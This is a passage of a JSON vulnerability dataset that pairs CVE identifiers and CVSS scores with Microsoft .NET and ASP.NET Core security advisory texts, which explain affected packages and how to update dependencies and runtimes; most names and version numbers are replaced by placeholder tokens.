Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG NUMBERTAG or later APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? .NET Core projects have two types of dependencies: direct and transitive. You must update your projects using the following instructions to address both types of dependency. APITAG APITAG .NET Core Project formats .NET Core has two different project file formats, depending on what software created the project NUMBERTAG APITAG is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG csproj is the format used in .NET Core NUMBERTAG NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG Direct dependencies Direct dependencies are discoverable by examining your csproj file or your APITAG file. They can be fixed by editing the project file direct dependencies or using APITAG to update the dependency. The APITAG package is not meant to be directly depended on and will not appear in your direct dependency list. 
Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in three ways, depending on your project format project format : In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects OR . By examining the APITAG file contained in the root directory of your project for APITAG based projects. The APITAG and APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. APITAG APITAG Fixing direct dependencies in a csproj based project / Visual Studio NUMBERTAG Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. 
The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing Direct Dependencies in FILETAG based project / Visual Studio NUMBERTAG Open your APITAG file in your editor. Look for the dependencies section. Below is an example dependencies section: CODETAG This example has three direct dependencies: APITAG , APITAG and APITAG . APITAG is the platform the application targets, you should ignore this. The other packages expose their version to the right of the package name. In our example, our non platform packages are version NUMBERTAG Review your direct dependencies for any instance of the packages and versions listed above. In the example above, there is a direct dependency on a vulnerable package, APITAG version NUMBERTAG To update to the fixed package, change the version number to be the appropriate package for your release. In the example, this would be updating APITAG to NUMBERTAG After updating the vulnerable package versions, save your APITAG file. The dependencies section in our example APITAG would now look as follows: CODETAG If you are using Visual Studio and save your updated APITAG file, Visual Studio will restore the new package version. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. 
 If you are not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependency. After you have addressed all of your direct dependencies, you must also review your transitive dependencies. After you've addressed all of your direct dependencies, you must review your transitive dependencies. Discovering and fixing transitive dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json or the APITAG file project lock json . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In the screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG (csproj/VS NUMBERTAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. 
Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . 
If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. APITAG APITAG Manually reviewing FILETAG APITAG Open the APITAG file in your editor. We suggest you use an editor that understands json and allows you to collapse and expand nodes to review this file; both Visual Studio and Visual Studio Code provide this functionality. If you are using Visual Studio the APITAG file is \u201cunder\u201d the APITAG file. Click the right pointing triangle, \u25b7, to the left of the APITAG file to expand the solution tree to expose the APITAG file. The following image shows a project with the APITAG file expanded to show the APITAG file. FILETAG Search the APITAG file for the vulnerable packages, using the format APITAG , using each of the package names from the table above. If you find any vulnerable assembly name in your search examine the line on which they are found, the version number is after the APITAG and compare to the vulnerable versions table above. For example a search result that shows APITAG is a reference to NUMBERTAG of APITAG . If your APITAG file includes references to any of the package versions shown above then you will need to fix the transitive dependencies. If you have not found any reference to a vulnerable version of APITAG this means none of your direct dependencies depend on any vulnerable packages or you have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your APITAG file to override the transitive dependency. Open your APITAG and find the dependencies section. For example: CODETAG For each of the vulnerable packages your search returned you must add a direct dependency to the updated version by adding it to the APITAG file. 
You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG version NUMBERTAG you would add a reference to the appropriate fixed version NUMBERTAG Edit the APITAG file as follows: CODETAG After you have added direct dependencies to the fixed packages, save your APITAG file. If you are using Visual Studio save your updated APITAG file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output Window APITAG and changing the Show output from drop down list to Package Manager. If you are not using Visual Studio open a command line and change to your project directory. Execute the dotnet restore command to restore your new dependencies. Rebuilding your application Finally you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87499. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  87500. "severity": "MEDIUM",
  87501. "baseScore": 5.5,
  87502. "impactScore": 3.6,
  87503. "exploitabilityScore": 1.8
  87504. },
  87505. {
  87506. "CVE_ID": "CVE-2017-11879",
  87507. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/277",
  87508. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/277",
  87509. "Repo_new": "aspnet/announcements",
  87510. "Issue_Created_At": "2017-11-14T15:24:44Z",
  87511. "description": "Reserved. APITAG issue has been reserved for a potential future security announcement._ This does not mean a security advisory is coming soon, it simply gives us the ability to predict the issue number that will be used in the future.",
  87512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87513. "severity": "HIGH",
  87514. "baseScore": 8.8,
  87515. "impactScore": 5.9,
  87516. "exploitabilityScore": 2.8
  87517. },
  87518. {
  87519. "CVE_ID": "CVE-2020-0602",
  87520. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/402",
  87521. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/402",
  87522. "Repo_new": "aspnet/announcements",
  87523. "Issue_Created_At": "2020-01-14T18:01:27Z",
  87524. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a denial of service vulnerability that exists when ASP.NET Core improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. The update addresses the vulnerability by correcting how the ASP.NET Core web application handles web requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version that is listed in affected software affected runtime or your application has a dependency on any of the packages listed in affected packages affected packages , you're exposed to the vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG application using APITAG APITAG APITAG Affected packages Any ASP.NET Core based application that uses any of the vulnerable packages that are shown below, or any ASP.NET Core application running on .NET Core NUMBERTAG or NUMBERTAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG How do I fix the issue? 
First examine the versions of .NET Core you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG APITAG APITAG Updated runtimes and SDKs For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG or SDK NUMBERTAG APITAG Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have multiple runtimes or SDKs installed, you must update all runtimes or SDKs separately. Once you've installed the updated runtime or SDK, restart your apps for the update to take effect. Applications targeting .NET Core runtime Update your runtime and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks then restart your application. Applications targeting .NET Framework First update your .NET Core runtimes and SDKs to the versions listed in Updated runtimes and SDKs fixed runtime sdks . As targeting .NET Framework adds dependencies for various packages, you must update the dependencies your application uses, recompile, and redeploy your application. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG that, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. 
Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. 
Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you haven't found any reference to any vulnerable packages, this means one of the following: None of your direct dependencies depend on any vulnerable packages. You have already fixed the problem by updating the direct dependencies. APITAG APITAG Fixing Dependencies APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. 
You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Finally, you must rebuild your application, test, and redeploy. 
Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Tom Deseyn of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87525. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87526. "severity": "HIGH",
  87527. "baseScore": 7.5,
  87528. "impactScore": 3.6,
  87529. "exploitabilityScore": 3.9
  87530. },
  87531. {
  87532. "CVE_ID": "CVE-2022-24464",
  87533. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/212",
  87534. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/212",
  87535. "Repo_new": "dotnet/announcements",
  87536. "Issue_Created_At": "2022-03-08T18:31:46Z",
  87537. "description": "Microsoft Security Advisory CVETAG | .NET Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET CORE NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a Denial of Service vulnerability, which exists in .NET NUMBERTAG NET NUMBERTAG and .NET CORE NUMBERTAG when parsing certain types of http form requests. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG APITAG from FILETAG .NET NUMBERTAG and .NET NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. 
In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgement Lars Eidnes URLTAG with FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87538. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87539. "severity": "HIGH",
  87540. "baseScore": 7.5,
  87541. "impactScore": 3.6,
  87542. "exploitabilityScore": 3.9
  87543. },
  87544. {
  87545. "CVE_ID": "CVE-2021-34485",
  87546. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/196",
  87547. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/196",
  87548. "Repo_new": "dotnet/announcements",
  87549. "Issue_Created_At": "2021-08-10T21:53:06Z",
  87550. "description": "Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. An information disclosure vulnerability exists in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG when dumps created by the tool to collect crash dumps and dumps on demand are created with global read permissions on Linux and APITAG Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or lower APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. 
You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. 
Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87551. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  87552. "severity": "MEDIUM",
  87553. "baseScore": 5.5,
  87554. "impactScore": 3.6,
  87555. "exploitabilityScore": 1.8
  87556. },
  87557. {
  87558. "CVE_ID": "CVE-2021-34485",
  87559. "Issue_Url_old": "https://github.com/github/advisory-database/issues/741",
  87560. "Issue_Url_new": "https://github.com/github/advisory-database/issues/741",
  87561. "Repo_new": "github/advisory-database",
  87562. "Issue_Created_At": "2022-10-12T20:44:32Z",
  87563. "description": ".NET CVE backfill round NUMBERTAG Hello, Please find the next batch of .NET CVEs for backfill below. //cc MENTIONTAG MENTIONTAG CVE | Announcement date | CVE URL | Announcement URL | APITAG Advisory | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG 
